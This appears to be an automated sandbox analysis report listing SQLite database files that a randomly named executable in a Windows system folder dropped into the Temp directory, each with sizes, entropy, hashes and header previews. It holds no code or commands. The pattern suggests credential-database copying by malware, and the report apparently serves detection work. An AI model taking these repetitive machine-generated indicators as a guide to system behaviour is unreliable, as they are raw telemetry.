                                                                                                C:\Users\user\AppData\Local\Temp\Ovkl5ZsbyU

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\P1LPVYqpAI

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\P2vPeCK9G6

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\P9MK7leq5n

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PDkQN02tR6

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PR7UphZRTm

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Pcs2x3PZXc

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PhJhRciSqW

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PhseK1OkV9

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PktrJHSzNV

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Po1EvQWx7C

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PxKGTcVe6G

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Q1HfFL7qvc

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\QBjUBhcElg

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\QJQPuJWZZO

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Qc0GTfGUr2

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\QcMH5cdSEe

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Qj8Ia0mw1c

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\RJVrWFMWzC

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\RT0sKQcZcs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\RcPt38OQrM

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Re0iVfuufi

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\SZthGkQ0Kj

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\SatacVVFs1

                                                                                                Download File
